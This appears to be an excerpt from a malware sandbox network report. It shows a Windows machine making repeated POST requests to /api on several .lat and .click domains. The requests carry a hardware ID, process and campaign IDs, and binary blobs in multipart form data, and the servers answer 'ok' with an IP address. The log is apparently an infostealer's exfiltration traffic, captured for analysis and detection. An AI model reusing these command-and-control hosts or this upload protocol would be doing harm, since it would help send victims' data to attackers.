2024-12-19 09:13:48 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-12-19 09:13:48 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 7a 35 68 63 73 57 44 30 49 6b 53 72 49 58 57 76 2f 52 47 37 61 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: z5hcsWD0IkSrIXWv/RG7aw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.6	50328	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:48 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=CN32LKANS6DPM5IT4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19957 Host: grannyejh.lat
2024-12-19 09:13:48 UTC	15331	OUT	Data Raw: 2d 2d 43 4e 33 32 4c 4b 41 4e 53 36 44 50 4d 35 49 54 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 43 4e 33 32 4c 4b 41 4e 53 36 44 50 4d 35 49 54 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 4e 33 32 4c 4b 41 4e 53 36 44 50 4d 35 49 54 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d Data Ascii: --CN32LKANS6DPM5IT4Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--CN32LKANS6DPM5IT4Content-Disposition: form-data; name="pid"3--CN32LKANS6DPM5IT4Content-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-19 09:13:48 UTC	4626	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 Data Ascii: +?2+?2+?o?Mp5p_
2024-12-19 09:14:03 UTC	1127	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4d8g7rul6j4rblq90omr84dapu; expires=Mon, 14 Apr 2025 03:00:27 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2B28xww1%2FqO4OrRWy30Kof2dQH0yxPcXdQfzEupj1XfsUhZAuJAMkjGH10WTEZPU8yHFPljV%2BJxi8ZWzSGVgvOeE7XsnsIx2hHqmvIpSiJG%2BqUrIHC0h%2FmPlMvnzgFmi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f46475c1a15432b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1753&min_rtt=1750&rtt_var=662&sent=15&recv=23&lost=0&retrans=0&sent_bytes=2830&recv_bytes=20915&delivery_rate=1645070&cwnd=189&unsent_bytes=0&cid=faa3fb8d4a35196c&ts=15301&x=0"
2024-12-19 09:14:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.6	50349	104.21.66.85	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:56 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2VFOOEBTNL4V User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1285 Host: aspecteirs.lat
2024-12-19 09:13:56 UTC	1285	OUT	Data Raw: 2d 2d 32 56 46 4f 4f 45 42 54 4e 4c 34 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 56 46 4f 4f 45 42 54 4e 4c 34 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 56 46 4f 4f 45 42 54 4e 4c 34 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 32 56 46 4f 4f 45 42 54 4e 4c 34 Data Ascii: --2VFOOEBTNL4VContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--2VFOOEBTNL4VContent-Disposition: form-data; name="pid"1--2VFOOEBTNL4VContent-Disposition: form-data; name="lid"CVmr0t--installs--2VFOOEBTNL4
2024-12-19 09:14:12 UTC	1132	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0ldpnt248abdt7jqfapm7msc4h; expires=Mon, 14 Apr 2025 03:00:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0bbsQOyHu0Ehi9wYwR%2FzkgQ%2FFvCtDnnqJOWfxcspQ4yVR%2FCie8w05pzWqDmSKYrdCXNKziu2PnY%2FWcfUmncEDrLZ2MH4OEnwv5InXZ8Hc9JxEZZqCYnMXz8B1%2BXtl3Gzdw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464793cbab4249-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1723&rtt_var=661&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2194&delivery_rate=1637689&cwnd=230&unsent_bytes=0&cid=a6370ca68cf11e66&ts=15381&x=0"
2024-12-19 09:14:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.6	50350	104.21.23.76	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:13:56 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U0M0P0NZ7I5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12816 Host: pancakedipyps.click
2024-12-19 09:13:56 UTC	12816	OUT	Data Raw: 2d 2d 55 30 4d 30 50 30 4e 5a 37 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 30 4d 30 50 30 4e 5a 37 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 30 4d 30 50 30 4e 5a 37 49 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 55 30 4d 30 50 30 4e 5a 37 49 35 0d 0a 43 6f 6e 74 65 Data Ascii: --U0M0P0NZ7I5Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--U0M0P0NZ7I5Content-Disposition: form-data; name="pid"2--U0M0P0NZ7I5Content-Disposition: form-data; name="lid"FATE99--test--U0M0P0NZ7I5Conte
2024-12-19 09:14:10 UTC	1128	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tlud4ir9qh7htog8euepvsdhku; expires=Mon, 14 Apr 2025 03:00:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KcZm2U76al5JGShL1KQq6rkMnpY3zEy6cmRTgpWR1ZhyNI2%2FhP89gGx66pnLo6MNYHiM7t%2B2jU3Ck25At7M1lYUU9osJCQDERUyokFK7On4pHPm0shYZQxmSUZDykAy5Rjb2z4xO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f464793dce4c344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1513&rtt_var=569&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2848&recv_bytes=13752&delivery_rate=1921052&cwnd=215&unsent_bytes=0&cid=bdd21b6ce52a6b33&ts=13805&x=0"
2024-12-19 09:14:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.6	50372	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:04 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8XMK5X300ZQABUV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12841 Host: grannyejh.lat
2024-12-19 09:14:04 UTC	12841	OUT	Data Raw: 2d 2d 38 58 4d 4b 35 58 33 30 30 5a 51 41 42 55 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 58 4d 4b 35 58 33 30 30 5a 51 41 42 55 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 58 4d 4b 35 58 33 30 30 5a 51 41 42 55 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 38 58 4d 4b 35 Data Ascii: --8XMK5X300ZQABUVContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--8XMK5X300ZQABUVContent-Disposition: form-data; name="pid"2--8XMK5X300ZQABUVContent-Disposition: form-data; name="lid"PsFKDg--pablo--8XMK5
2024-12-19 09:14:19 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=06u5omb94vqerk7hsh07gvv5pn; expires=Mon, 14 Apr 2025 03:00:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=onLwzwY2SwF%2FP7niP4WONB5hes%2FFK2WH2HH%2BsvF0TQqGSDsLh%2BnAc%2FAjxlhI1pARoOXuaRhnbBm7e0MpFvN9sRdbVtBmG3BniqVdTPNY558Q92u1g7XhBgYNQ%2B7DvXUB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4647c3de0341e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1559&rtt_var=596&sent=15&recv=18&lost=0&retrans=0&sent_bytes=2830&recv_bytes=13775&delivery_rate=1817050&cwnd=249&unsent_bytes=0&cid=7e4852f9c74574aa&ts=14558&x=0"
2024-12-19 09:14:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.6	50371	172.67.179.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:04 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6JWLI92SP2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1259 Host: grannyejh.lat
2024-12-19 09:14:04 UTC	1259	OUT	Data Raw: 2d 2d 36 4a 57 4c 49 39 32 53 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 4a 57 4c 49 39 32 53 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4a 57 4c 49 39 32 53 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 36 4a 57 4c 49 39 32 53 50 32 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --6JWLI92SP2Content-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--6JWLI92SP2Content-Disposition: form-data; name="pid"1--6JWLI92SP2Content-Disposition: form-data; name="lid"PsFKDg--pablo--6JWLI92SP2Content-
2024-12-19 09:14:19 UTC	1120	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mhaa9jsleqevjcj3qdn07p7l95; expires=Mon, 14 Apr 2025 03:00:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=biWV3F76Gmr7744%2B1pmz5zY9G1hsnrjTL6DCYB%2F4QG39r6nW%2BmvdOjs8V2WNV1xnBtpcXTI02nZs2vqz45ex9KTRaO2DOTwBUvVrkqlbEgvDeYdJfp25NmCr3aeDGpso"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4647c4497043b8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1862&min_rtt=1861&rtt_var=700&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=2165&delivery_rate=1561497&cwnd=231&unsent_bytes=0&cid=de5681d04c7bdd86&ts=15403&x=0"
2024-12-19 09:14:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.6	50375	104.21.23.76	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:11 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WG31LMZ9JYZ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15062 Host: pancakedipyps.click
2024-12-19 09:14:11 UTC	15062	OUT	Data Raw: 2d 2d 57 47 33 31 4c 4d 5a 39 4a 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 47 33 31 4c 4d 5a 39 4a 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 47 33 31 4c 4d 5a 39 4a 59 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 57 47 33 31 4c 4d 5a 39 4a 59 5a 0d 0a 43 6f 6e 74 65 Data Ascii: --WG31LMZ9JYZContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--WG31LMZ9JYZContent-Disposition: form-data; name="pid"2--WG31LMZ9JYZContent-Disposition: form-data; name="lid"FATE99--test--WG31LMZ9JYZConte
2024-12-19 09:14:26 UTC	1126	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jne7e5meb1ah09mlvfhr6i0an5; expires=Mon, 14 Apr 2025 03:00:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AfND6KZPWX%2FB8GYltkRHFCxlSejhqIqlJEJb2FOU2ukFnoMwvtdp1OAIxfwGqdr0mpIDAHfWxWt4sGX8SSOsULPGf3AVp0bcyNFHeB5tqHABnsC74ysRnj3b2LcsCV49PTjFIkYx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4647f20f0941c6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1687&rtt_var=636&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2849&recv_bytes=15998&delivery_rate=1716637&cwnd=199&unsent_bytes=0&cid=9dbbe408a2a46f2c&ts=14863&x=0"
2024-12-19 09:14:26 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.6	50379	104.21.66.85	443

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:14:13 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ICHKGMEQRQA8LG User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 29543 Host: aspecteirs.lat
2024-12-19 09:14:13 UTC	15331	OUT	Data Raw: 2d 2d 49 43 48 4b 47 4d 45 51 52 51 41 38 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 36 36 34 38 41 34 42 45 46 31 45 34 44 41 33 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 43 48 4b 47 4d 45 51 52 51 41 38 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 43 48 4b 47 4d 45 51 52 51 41 38 4c 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 56 6d 72 30 74 2d 2d 69 6e 73 74 61 6c 6c 73 0d 0a 2d 2d 49 43 48 4b 47 Data Ascii: --ICHKGMEQRQA8LGContent-Disposition: form-data; name="hwid"86648A4BEF1E4DA3AC8923850305D13E--ICHKGMEQRQA8LGContent-Disposition: form-data; name="pid"1--ICHKGMEQRQA8LGContent-Disposition: form-data; name="lid"CVmr0t--installs--ICHKG
2024-12-19 09:14:13 UTC	14212	OUT	Data Raw: a4 a2 be b7 6e dc 5a 89 c9 6f 0d 37 33 24 7c f5 12 29 1e 50 51 4b c2 da c6 6e f9 6d 37 3e ba 07 00 b9 05 ae d7 ff 18 35 e6 4f bc 17 8e 45 0f d6 01 a0 4b 3f 94 36 b8 fd e4 f8 0f 56 d3 cd b0 aa 2c 9e 69 9f 3c 30 65 fc da 99 98 67 d6 0e ab 01 57 a8 02 5c b2 72 fa 6f b6 8b 13 60 23 e0 52 ff 5c be b1 7c f8 39 50 9b 91 c4 64 4f 7a da a5 48 a6 f2 13 7a ff 2d 6d e5 a3 21 ea e3 81 af 6c 1b c9 b0 ee 55 5d 6c 2d db 7e f1 e2 41 b1 15 5d 10 5b 91 fd c6 e9 02 fb e4 47 49 d7 e3 a6 24 cc 4c 5b ba d2 84 c8 39 72 0e d2 2e c7 91 74 33 43 5d 72 82 d2 f6 be 01 ec 07 3b 22 ae eb a6 0f cd bf 2b 82 d4 fa 1e 05 5f 0a 7c 03 d4 78 e1 e6 14 e6 bf 35 a6 cb 03 6d fc 84 44 af cf 09 fa 6f 6d 3b cf c3 df 7a 2f 15 6f 5e 8a 52 eb 8f 3d 5a b5 1b 48 4d 79 64 30 cc 8f f2 84 31 cb 5f 31 6d fe Data Ascii: nZo73$\|)PQKnm7>5OEK?6V,i<0egW\ro`#R\\|9PdOzHz-m!lU]l-~A][GI$L[9r.t3C]r;"+_\|x5mDom;z/o^R=ZHMyd01_1m
2024-12-19 09:14:28 UTC	1129	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:14:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8rn436qrvhpo70c0s3lonstvcl; expires=Mon, 14 Apr 2025 03:00:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fi6SGeBEJp6etEsYJars3bq%2BihciFXbtAmZ2D3DW77dR3F2sb8W3aIwtxsx5vzoOjRtkiKKP0bD4Jxt8yobAsMVRyq92cH%2Bg5UTJzlUzRc2yOdfdNE797iu356lgCqTY7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f4647fdddc54304-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1593&rtt_var=598&sent=21&recv=34&lost=0&retrans=0&sent_bytes=2833&recv_bytes=30521&delivery_rate=1827284&cwnd=248&unsent_bytes=0&cid=2b8877875cfa6638&ts=14962&x=0"
2024-12-19 09:14:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-19 09:14:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

